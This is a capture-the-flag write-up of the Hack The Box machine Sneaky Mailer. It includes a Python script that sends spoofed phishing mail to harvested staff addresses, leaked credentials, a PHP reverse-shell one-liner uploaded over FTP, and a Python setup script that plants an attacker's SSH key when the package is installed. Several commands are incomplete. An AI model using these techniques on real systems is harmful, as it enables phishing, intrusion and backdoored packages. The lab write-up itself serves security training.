Sneaky Mailer – Hack The Box Write-up

Information Gathering

As usual, let's start with the nmap scan.

From the nmap output I saw that port 80 was open. In parallel I also ran wfuzz for subdomains.

Later, when I tried to access port 80, the browser was redirected to sneakycorp.htb. I added this to the hosts file and tried accessing it in the browser.

I also added dev.sneakycorp.htb to the hosts file.

On the team page I was able to see a lot of mail addresses.


I extracted all the email addresses into a text file.

Email extraction can be done with inline tools.

The SMTP port was open, so I decided to try sending messages to the employees and phish them.

I crafted a simple script to get it done:

import smtplib

def send(sender, receiver):
    # Header lines must start at column 0; indenting them inside the
    # triple-quoted string produces a malformed message.
    message = """From: From Person <{a}>
To: To Person <{b}>
Subject: open this link
""".format(a=sender, b=receiver)
    print("sending mail to {c} from {d}".format(d=sender, c=receiver))
    smtpObj = smtplib.SMTP('sneakycorp.htb')
    smtpObj.sendmail(sender, receiver, message)
    smtpObj.quit()
    print("[+] sent!")

# email.txt holds the harvested addresses, one per line
with open("email.txt") as doc:
    addresses =

# every address receives a mail that appears to come from the previous
# address in the list (index -1 wraps around to the last entry)
for x in range(len(addresses)):
    send(addresses[x], addresses[x - 1])

In parallel, I opened a nc listener on port 80.

I was able to get a response.

I tried decoding the response using Burp Suite.

I got a set of credentials:

Username: paulbyrd

Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

With this username I tried SSH login and also FTP login.

Later I tried port 993 (IMAP) with the command below:

openssl s_client -crlf -connect

a login paulbyrd ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

The login was successful.

In INBOX.Sent Items, I was able to find some files.

Let's try to read the emails:

a fetch 1 BODY.PEEK[]

This showed me:

a fetch 1 BODY.PEEK[]
* 1 FETCH (BODY[] {2167}
MIME-Version: 1.0
To: root <root@debian>
From: Paul Byrd <paulbyrd@sneakymailer.htb>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500
Importance: normal
X-Priority: 3
Content-Type: multipart/alternative;

Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Hello administrator, I want to change this password for the developer accou=

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it=20


a OK FETCH completed.

In the content I got a new username and password.
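The FETCH output above is a multipart/alternative message whose parts are quoted-printable encoded (the `=` at the end of `accou=`, `=3D` for `=`, `=20` for a trailing space). As an added example that is not part of the original write-up, here is how Python's email package parses such a message and recovers the plain-text part with the transfer encoding undone; the message is a constructed sample modelled on the one above, and the password is a placeholder, not the value from the box.

```python
import email
from email import policy

# Constructed sample modelled on the FETCH output above. The password
# value is a PLACEHOLDER; it deliberately contains '=' and '@' to show
# the quoted-printable escapes (=3D and =40) being decoded.
RAW_MESSAGE = b"""\
MIME-Version: 1.0
To: root <root@debian>
From: Paul Byrd <paulbyrd@sneakymailer.htb>
Subject: Password reset
Content-Type: multipart/alternative; boundary="bnd"

--bnd
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="utf-8"

Hello administrator, I want to change this password for the developer accou=
nt

Username: developer
Original-Password: P=40ssw0rd=3DPLACEHOLDER

Please notify me when you do it=20
--bnd
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="utf-8"

<html><body><p>Username: developer</p></body></html>=
--bnd--
"""


def decoded_plain_text(raw: bytes) -> str:
    """Return the text/plain alternative with quoted-printable and the
    declared charset already decoded (soft line breaks are joined)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    plain = msg.get_body(preferencelist=("plain",))
    return plain.get_content()


def extract_credentials(raw: bytes) -> dict:
    """Pull 'Username' and 'Original-Password' lines out of the decoded
    plain-text part, the way one would when triaging a leaked mailbox."""
    creds = {}
    for line in decoded_plain_text(raw).splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() in ("Username", "Original-Password"):
            creds[key.strip()] = value.strip()
    return creds
```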



From the second mail

Later I tried to access FTP as developer and it was successful.

We got a directory dev.

I tried uploading a reverse shell via FTP:

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

I was able to obtain the reverse shell by hitting http://dev.sneakymailer.htb/revShell.php.

Then I became developer with su.

Now it's time for some Linux enumeration and privilege escalation.

I got something interesting.


I cracked it using john.

I got a new set of credentials:

Username: pypi

Password: soufianeelhaoui

In the second mail which we opened, there were instructions for low.

Low was asked to install a PyPI module.

I made two files, the setup script and .pypirc.

The link above gives a clear idea.

The content of the setup script is:

└──╼ $cat
import setuptools

# Runs when the package is installed: append my public key to low's
# authorized_keys so I can log in over SSH afterwards.
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGmUfuM0l7TH3ucVv9QMNvIWBgKFjGgweyLI7u8rlDmS d3r1c@myParrot")
except Exception as e:
    print(e)

setuptools.setup(
    name = "d3r1c",
    version = "0.0.1",
    author = "Example Author",
    author_email = "",
    description = "A small example package",
    long_description = "",
    long_description_content_type = "text/markdown",
    url = "",
    packages = setuptools.find_packages(),
    classifiers = [
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)

Here I am writing an SSH key for accessing the user low.

Later I uploaded it to the developer shell

and executed it.

Now that my SSH key is written for low, it is possible for me to log in as user low using SSH.

Here key1 is the private key I have.

We got the user shell!!

I again ran the Linux enumeration and found the below way to become root.

By executing the below commands I got root.

The link above shows how to use pip to get root.

Machine rooted 🙂
